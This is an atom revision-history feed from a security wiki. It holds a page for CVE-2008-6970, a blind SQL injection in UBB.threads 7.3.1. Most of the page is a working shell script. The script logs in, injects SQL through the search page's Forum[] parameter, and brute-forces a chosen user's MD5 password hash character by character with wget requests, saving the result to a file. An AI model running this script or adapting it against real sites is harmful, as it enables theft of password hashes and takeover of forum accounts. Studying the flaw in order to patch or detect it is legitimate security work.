https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2008-6970 UBB.threads 7.3.1 SQL注入漏洞 - Revision history
2026-04-14T11:02:44Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2008-6970_UBB.threads_7.3.1_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=888&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> DESCRIPTION Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. FILE <pre> CVE-2008-6970.sh - Shell..."
2021-04-02T03:21:34Z
<p>Created page with "==INFO== <pre> DESCRIPTION Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. FILE <pre> CVE-2008-6970.sh - Shell..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
<br />
DESCRIPTION<br />
<br />
Exploits PHP parameter input validation flaw and blindly brute force stored MD5 SQL hash for given user ID. <br />
<br />
FILE<br />
<br />
<pre><br />
CVE-2008-6970.sh - Shell code program.<br />
</pre><br />
<br />
SOURCE<br />
<br />
https://github.com/KyomaHooin/CVE-2008-6970<br />
<br />
<br />
</pre><br />
<br />
<br />
==CVE-2008-6970.sh==<br />
<pre><br />
#!/bin/sh<br />
#<br />
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack<br />
#<br />
<br />
hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)<br />
main='http://[removed]/ubbthreads/ubbthreads.php'<br />
login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'<br />
base="$main?ubb=dosearch&fromsearch=1&Words=body"<br />
inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"<br />
<br />
hash=()<br />
<br />
replace(){<br />
echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"<br />
}<br />
<br />
push(){<br />
echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"<br />
}<br />
<br />
brute(){<br />
for char in ${hex[*]}; do<br />
#replace string<br />
inj=`replace "$inject" $char`<br />
#inject<br />
wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"<br />
#if match then return characters to hash array<br />
if [ -z `cat ubb | grep "There are no results"` ]; then<br />
hash+=($char)<br />
return<br />
fi<br />
rm ubb<br />
done<br />
}<br />
<br />
# INIT<br />
<br />
#get PHPSESSID cookie<br />
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main<br />
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction<br />
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main<br />
#blind SQL injection brute force attack<br />
for ((i=0; i<32;i++)); do<br />
brute<br />
inject=`push "$inject" "R"`<br />
done<br />
#clean<br />
rm cookies.txt<br />
#print the hash<br />
printf "%s" "${hash[@]}" >> hash.txt<br />
<br />
<br />
</pre></div>
Pwnwiki